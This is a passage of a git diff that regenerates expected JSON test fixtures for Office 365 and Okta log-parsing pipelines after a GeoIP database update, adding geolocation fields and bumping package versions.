@@ -699,7 +747,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545772500Z", + "ingested": "2021-12-14T14:49:46.421944931Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -736,6 +784,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ 
@@ -794,7 +854,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545780600Z", + "ingested": "2021-12-14T14:49:46.421945488Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json index 29a6e5ba1cb..d558321b748 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json 
+++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json
@@ -2,6 +2,18 @@
 "expected": [
 {
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "port": 12345,
 "ip": "67.43.156.13"
 },
@@ -50,7 +62,7 @@
 "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-12-09T13:42:51.551520Z",
+ "ingested": "2021-12-14T14:49:48.538275519Z",
 "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}",
 "code": "Yammer",
 "provider": "Yammer",
@@ -128,7 +140,7 @@
 "ip": "fdfd::555"
 },
 "event": {
- "ingested": "2021-12-09T13:42:51.551529300Z",
+ "ingested": "2021-12-14T14:49:48.538278327Z",
 "original": "{\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"CreationTime\":\"2020-02-28T09:39:20\",\"GroupName\":\"Company group\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ObjectId\":\"Company group\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d292e16\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}",
 "code": "Yammer",
 "provider": "Yammer",
diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml
index ee5f19a1765..5c5f2c07fc6 100644
--- a/packages/o365/manifest.yml
+++ b/packages/o365/manifest.yml
@@ -1,6 +1,6 @@
 name: o365
 title: Office 365 Logs
-version: 1.3.1
+version: 1.3.2
 release: ga
 description: Collect and parse event logs from Office 365 with Elastic Agent.
 type: integration
diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml
index 4f334f788e1..f804110f744 100644
--- a/packages/okta/changelog.yml
+++ b/packages/okta/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "1.3.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "1.3.1"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
index 4c6d7c3f506..9de77a0293a 100644
--- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
+++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json
@@ -1,33 +1,6 @@
 {
 "expected": [
 {
- "source": {
- "geo": {
- "continent_name": "Asia",
- "region_iso_code": "CN-JL",
- "country_name": "China",
- "region_name": "Jilin",
- "location": {
- "lon": 125.3228,
- "lat": 43.88
- },
- "country_iso_code": "CN"
- },
- "as": {
- "number": 4837,
- "organization": {
- "name": "CHINA UNICOM China169 Backbone"
- }
- },
- "user": {
- "full_name": "xxxxxx",
- "id": "00u1abvz4pYqdM8ms4x6"
- },
- "ip": "175.16.199.1"
- },
- "tags": [
- "preserve_original_event"
- ],
 "@timestamp": "2020-02-14T22:18:51.843Z",
 "ecs": {
 "version": "1.12.0"
@@ -56,8 +29,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417340700Z", + "ingested": "2021-12-14T14:49:51.612964602Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -127,36 +119,12 @@ "name": "Mac" }, "version": "72.0." - } - }, - { - "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JL", - "country_name": "China", - "region_name": "Jilin", - "location": { - "lon": 125.3228, - "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, - "user": { - "full_name": "xxxxxx", - "id": "00u1abvz4pYqdM8ms4x6" - }, - "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-02-14T22:18:51.843Z", "ecs": { "version": "1.12.0" 
@@ -185,8 +153,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417349900Z", + "ingested": "2021-12-14T14:49:51.612967594Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -256,36 +243,12 @@ "name": "Mac" }, "version": "72.0." - } - }, - { - "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JL", - "country_name": "China", - "region_name": "Jilin", - "location": { - "lon": 125.3228, - "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, - "user": { - "full_name": "xxxxxx", - "id": "00u1abvz4pYqdM8ms4x6" - }, - "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-02-14T22:18:51.843Z", "ecs": { "version": "1.12.0" 
@@ -314,8 +277,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417355900Z", + "ingested": "2021-12-14T14:49:51.612968038Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United 
